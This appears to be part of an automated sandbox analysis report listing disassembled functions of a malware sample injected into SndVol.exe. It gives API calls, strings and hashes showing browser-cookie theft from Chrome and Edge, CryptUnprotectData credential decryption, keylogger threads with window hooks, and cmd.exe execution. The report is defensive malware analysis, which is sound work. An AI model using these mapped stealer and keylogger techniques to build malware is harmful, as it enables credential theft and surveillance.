                                                                        • Instruction ID: 9e0a3791066d23623740f3ad85699008eb74f4fe1b1b7afe59109a7611c931c1
                                                                        • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                        • Instruction Fuzzy Hash: A2B1C6716083509BDB24FB26CA90A6FB7E5BFC4354F80491FF88A43291EF70A9058B47
                                                                        Function 04476978 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __dosmaperr
                                                                        • String ID: H
                                                                        • API String ID: 2332233096-2852464175
                                                                        • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                        • Instruction ID: e878abfc3fb2447def7695257da451da953324f77c261d98af8d49fb877822d2
                                                                        • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                        • Instruction Fuzzy Hash: F5A14732A006549FEF18DF68CC917EE3BA1EB06324F15415EE816EB392DB31A853C752
                                                                        Function 04429564 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 04429569
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0442964A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8H_prologThrow
                                                                        • String ID: xdF$y~E
                                                                        • API String ID: 3222999186-3309775686
                                                                        • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                        • Instruction ID: bff9383d04d6b7d77e36034d69dc3ccb581cd2b69b3dc0931165ee6092053f1c
                                                                        • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                        • Instruction Fuzzy Hash: 3A5185B2900119AAEF14FFA2DE559DD7778BF10204FD0056FA80697192EF74BB488B91
                                                                        Function 29143A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 29143AF7
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 29143B26
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 29143BC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Enum$InfoQueryValue
                                                                        • String ID: [regsplt]
                                                                        • API String ID: 3554306468-4262303796
                                                                        • Opcode ID: baadaefb34b786a7d0a1e8a4e5b36536605f34b427cbcd535aa67c3c0fc3f52a
                                                                        • Instruction ID: 5c0c275721aa2f1b16b0b4a0a3285a78b2ace5300fb9ae33924b3a705dca6e38
                                                                        • Opcode Fuzzy Hash: baadaefb34b786a7d0a1e8a4e5b36536605f34b427cbcd535aa67c3c0fc3f52a
                                                                        • Instruction Fuzzy Hash: 6F516171D00119BAEB45DBE6DC81EEEB77CBF24308F805165E506E2090EF306B4ACBA5
                                                                        Function 0443AD62 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: PG$PG$PG
                                                                        • API String ID: 3519838083-760986564
                                                                        • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                                        • Instruction ID: 0b4c589ea73145f6e26c197fd634f7a4310c68f06b8efade76b7d4f5672242e3
                                                                        • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                                        • Instruction Fuzzy Hash: C551F370E402649AEF14FBB6CD905FE7768BF48309F8004AFE445AB292EFA46D45C761
                                                                        Function 2917E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strpbrk.LIBCMT ref: 2917E7B8
                                                                        • _free.LIBCMT ref: 2917E8D5
                                                                          • Part of subcall function 2916BD68: IsProcessorFeaturePresent.KERNEL32(00000017,2916BD3A,29135103,?,00000000,00000000,291320A6,00000000,00000000,?,2916BD5A,00000000,00000000,00000000,00000000,00000000), ref: 2916BD6A
                                                                          • Part of subcall function 2916BD68: GetCurrentProcess.KERNEL32(C0000417,?,29135103), ref: 2916BD8C
                                                                          • Part of subcall function 2916BD68: TerminateProcess.KERNEL32(00000000,?,29135103), ref: 2916BD93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 2812119850-3972193922
                                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                        • Instruction ID: e40915f640f25946212bf8c5d2cbdf44bdc2799e1e081aafcdcb86816b9f5263
                                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                        • Instruction Fuzzy Hash: 50519471D0021AAFDB08CFAADC41AEDB7F5EF58318F14816AD554EB351E7719B028B50
                                                                        Function 0446F486 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 3300345361-3972193922
                                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                        • Instruction ID: 3057cf5616d041c9da32e94487687e1b4adf6c818070cc7b2f56f984846b83e6
                                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                        • Instruction Fuzzy Hash: 0F51B375E00209AFDF14CFA9D880AAEB7B5FF48314F24416FD896E7311E631AE068B51
                                                                        Function 291734D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 29173515
                                                                        • _free.LIBCMT ref: 291735E0
                                                                        • _free.LIBCMT ref: 291735EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                        • API String ID: 2506810119-3942169294
                                                                        • Opcode ID: 63c914c9ae4312e0a28a687be8a2a6b674a784d5ebb58f834f5ad1255c08c8f8
                                                                        • Instruction ID: ac55c2a15436f49827e74b9dad9466d9c2a73323055087b6c20ff3b689530b5b
                                                                        • Opcode Fuzzy Hash: 63c914c9ae4312e0a28a687be8a2a6b674a784d5ebb58f834f5ad1255c08c8f8
                                                                        • Instruction Fuzzy Hash: A3317CB1A4435ABFDB25DB9AA880DDEBBF8EB89318F204066E50497200D7708B43CB50
                                                                        Function 2913C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2913C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 2913C531
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 2913C658
                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 2913C6C3
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 2913C63E
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 2913C670
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: 90a719c330005cfb528321d8a733c2ecdd9ef2d836d2264a2d26ab7d7790cb82
                                                                        • Instruction ID: 4eef03c29ac201e41a810c3f62d70321ab196105822e573584364b30f0aabe92
                                                                        • Opcode Fuzzy Hash: 90a719c330005cfb528321d8a733c2ecdd9ef2d836d2264a2d26ab7d7790cb82
                                                                        • Instruction Fuzzy Hash: 1D2127719101097ADB44E7B3DC55CEEB77CBF70119BC09025D90663194EF20AB4BC6D4
                                                                        Function 2913C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2913C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 2913C594
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 2913C727
                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 2913C792
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 2913C70D
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 2913C73F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: 236ebf1d0a772c6cdbaee9b52892ca58b64936d304b5297fc6695325582e1d4e
                                                                        • Instruction ID: 30cfa0577089bcd890cca3ced3d445b3a8eece3386536add2976a1c588473a3f
                                                                        • Opcode Fuzzy Hash: 236ebf1d0a772c6cdbaee9b52892ca58b64936d304b5297fc6695325582e1d4e
                                                                        • Instruction Fuzzy Hash: 41212431910109BADB44EBB7DC55CEEB77CBF60259B805029D906A3194EF20AB4BC6D4
                                                                        Function 2913A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2B8,?,00000000,00000000), ref: 2913A239
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2A2,?,00000000,00000000), ref: 2913A249
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2C4,?,00000000,00000000), ref: 2913A255
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                        • String ID: Offline Keylogger Started
                                                                        • API String ID: 465354869-4114347211
                                                                        • Opcode ID: 9861fc2ce29d66ed3e33beaf6ae04b6fae21acac16267837c74fb7a160e00407
                                                                        • Instruction ID: 097b21f846250d42af6d5b75efa040d2b7ce27e0511d172a9ddf2cf105be311c
                                                                        • Opcode Fuzzy Hash: 9861fc2ce29d66ed3e33beaf6ae04b6fae21acac16267837c74fb7a160e00407
                                                                        • Instruction Fuzzy Hash: 6F11A7B15002087EE214BB378DC5CBF7A7DDB911ACBC0551DF84612195EA21AF1ACAF6
                                                                        Function 2913AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 2913AFA9
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 2913AFB5
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2D0,?,00000000,00000000), ref: 2913AFC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                        • String ID: Online Keylogger Started
                                                                        • API String ID: 112202259-1258561607
                                                                        • Opcode ID: 9cf18d50acb0d32b61481efc07fd06de58becbaadb6fbff3c6e2fcad07043abc
                                                                        • Instruction ID: 4a7227a208a277b24bc09d0d4dd3776cc9673e5ff20a7f4ba1e2326a719d0984
                                                                        • Opcode Fuzzy Hash: 9cf18d50acb0d32b61481efc07fd06de58becbaadb6fbff3c6e2fcad07043abc
                                                                        • Instruction Fuzzy Hash: 8801C4A4A001483EF62476778CC6CBFBA7DCB921ACFC0141DF54212586D9255F1B86F9
                                                                        Function 29136A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 29136ABD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29136AC4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: CryptUnprotectData$crypt32
                                                                        • API String ID: 2574300362-2380590389
                                                                        • Opcode ID: 6f88d7ebfbe163485ec3a668016404f6ce97b76c61a047ac0082684c9a46774e
                                                                        • Instruction ID: 113134219141b034d2935b4445a0108845d5b457ba2fde39489e4bedbf8574e5
                                                                        • Opcode Fuzzy Hash: 6f88d7ebfbe163485ec3a668016404f6ce97b76c61a047ac0082684c9a46774e
                                                                        • Instruction Fuzzy Hash: 6101D835B0424AABDB0CDFAFD845DAE7BB8AF44388B40416DE955D3249DA349A01CBA0
                                                                        Function 2913515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,29135159), ref: 29135173
                                                                        • CloseHandle.KERNEL32(?), ref: 291351CA
                                                                        • SetEvent.KERNEL32(?), ref: 291351D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                        • String ID: Connection Timeout
                                                                        • API String ID: 2055531096-499159329
                                                                        • Opcode ID: f1fac4c4778a6125886f18e71131034301118207b8d2e9aa831d1db49002ee90
                                                                        • Instruction ID: 3784dda3256677c534ed2a54fee2f6d11e1cee85e4a9fe76f4a660d102046705
                                                                        • Opcode Fuzzy Hash: f1fac4c4778a6125886f18e71131034301118207b8d2e9aa831d1db49002ee90
                                                                        • Instruction Fuzzy Hash: FD01F235B50B80BFE729BB37CCC485BBFF1BF116193800A2DD58382A65DA34A602CB51
                                                                        Function 2913E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913E86E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8Throw
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 2005118841-1866435925
                                                                        • Opcode ID: ad480fc4295b3075b0a664cc6351894310b35289acdafaed96f539bd3f38d2b5
                                                                        • Instruction ID: 296ba9b172e27b9647bccacde6da0341af2f0c4e5d21f88b4b38e074e6cb3b47
                                                                        • Opcode Fuzzy Hash: ad480fc4295b3075b0a664cc6351894310b35289acdafaed96f539bd3f38d2b5
                                                                        • Instruction Fuzzy Hash: 4401D660D103087BEB48D697EC41FFE73785F2034CFC0D599AE0165481EA216B03CA6A
                                                                        Function 2913729B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • C:\Windows\SysWOW64\SndVol.exe, xrefs: 291376FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                        • API String ID: 0-3942169294
                                                                        • Opcode ID: e7ab4eae7b4e2361a092d1e1a15b6ff2cb8f1caaa429e93ef870297320e1f567
                                                                        • Instruction ID: 3f5fb8e650e8d31af8feb731e42b46d0f8c6d0f25c910802c91b55f7a1f0fe7b
                                                                        • Opcode Fuzzy Hash: e7ab4eae7b4e2361a092d1e1a15b6ff2cb8f1caaa429e93ef870297320e1f567
                                                                        • Instruction Fuzzy Hash: 1CF0F6B4B10184ABFB0C7637982C69C3ABB6F9028EFC04815E402DA189EB280F07C314
                                                                        Function 2914384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,291A52D8), ref: 2914385A
                                                                        • RegSetValueExW.ADVAPI32(291A52D8,?,00000000,00000001,00000000,00000000,291A52F0,?,2913F85E,pth_unenc,291A52D8), ref: 29143888
                                                                        • RegCloseKey.ADVAPI32(291A52D8,?,2913F85E,pth_unenc,291A52D8), ref: 29143893
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 63c0a71e5b09e591b2911ba552f3db8dd85b640ed73f9682d8f709042480d478
                                                                        • Instruction ID: 8ea61e0e66ef008eb90526cceb55348023a8f6c1ed9221668c9c743cee7623a6
                                                                        • Opcode Fuzzy Hash: 63c0a71e5b09e591b2911ba552f3db8dd85b640ed73f9682d8f709042480d478
                                                                        • Instruction Fuzzy Hash: 15F04971940118BBEF00ABA2ED49EEE777CFB44759F108615B80696150EB369B06DB90
                                                                        Function 2913DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 2913DFEC
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 2913E02B
                                                                          • Part of subcall function 291656CD: _Yarn.LIBCPMT ref: 291656EC
                                                                          • Part of subcall function 291656CD: _Yarn.LIBCPMT ref: 29165710
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913E051
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3628047217-1405518554
                                                                        • Opcode ID: 3e503777330b9a85ac08f860632081d76e90b5ff23de169c4bbc787211530557
                                                                        • Instruction ID: a2ad7606074f4512a4201fc2d443f7434ff60ff76eeaf01c6e5ae9e721c3e157
                                                                        • Opcode Fuzzy Hash: 3e503777330b9a85ac08f860632081d76e90b5ff23de169c4bbc787211530557
                                                                        • Instruction Fuzzy Hash: 53F08131500608BAD368EB62DCA19DB7BF49F30258F90D569A51606198EF30AB0AC688
                                                                        Function 29146129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 2914616B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID: /C $cmd.exe$open
                                                                        • API String ID: 587946157-3896048727
                                                                        • Opcode ID: 9bef302f6f082c714f2d0c8dd26af7deb5ae180dd7200e6f93b19850dc06721c
                                                                        • Instruction ID: 7959e428e3c389ff54d334b408ee3e29417c108ee3df5d1de86f4f041276e869
                                                                        • Opcode Fuzzy Hash: 9bef302f6f082c714f2d0c8dd26af7deb5ae180dd7200e6f93b19850dc06721c
                                                                        • Instruction Fuzzy Hash: 53E03070208344BBE348DAB2CCD4C6F72BC6B7024CB80AC1C704692090EF24AB0A8659
                                                                        Function 2913B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                        • UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                        • TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3123878439-4028850238
                                                                        • Opcode ID: f6fddf783daa7c027a422ef5eb7550c7139dc74e0b06635128a75093b5f76b25
                                                                        • Instruction ID: 6f99d1011257961c524371efff5fba590960b149c0f6b56f7c129b813d496fe4
                                                                        • Opcode Fuzzy Hash: f6fddf783daa7c027a422ef5eb7550c7139dc74e0b06635128a75093b5f76b25
                                                                        • Instruction Fuzzy Hash: 66E08C71204259AFE7282FA298C88657BBAFA01289380052CE6C241128C6354D40D794
                                                                        Function 2913140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 29131414
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2913141B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetCursorInfo$User32.dll
                                                                        • API String ID: 1646373207-2714051624
                                                                        • Opcode ID: 147916aa3618f15df4e882983f198ee075ccab0777fd58c2b32eddbbe39409df
                                                                        • Instruction ID: 36ac76d8a90b9268d49eceb49373a05adc41867ce4a82e15ac21640610af1970
                                                                        • Opcode Fuzzy Hash: 147916aa3618f15df4e882983f198ee075ccab0777fd58c2b32eddbbe39409df
                                                                        • Instruction Fuzzy Hash: 83B092B06212C8EBFF043BF3EA4C80D3A37B61430A3C10058F04AE110CCB388501EA60
                                                                        Function 291314AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 291314B9
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291314C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                        • API String ID: 2574300362-1519888992
                                                                        • Opcode ID: 50f3a7b635ec1fb8ea3686e442344e972a28bf4a3ee4894a21fd55734375526d
                                                                        • Instruction ID: 252e4f6b4280532e0458d499086a4754dd08bd3a005edaa01ba411599b159260
                                                                        • Opcode Fuzzy Hash: 50f3a7b635ec1fb8ea3686e442344e972a28bf4a3ee4894a21fd55734375526d
                                                                        • Instruction Fuzzy Hash: 06B092B06602C8DBEB043BE7E94C80D3A7AB62531B3810089F446C214DCB388501EF11
                                                                        Function 04469F2D Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
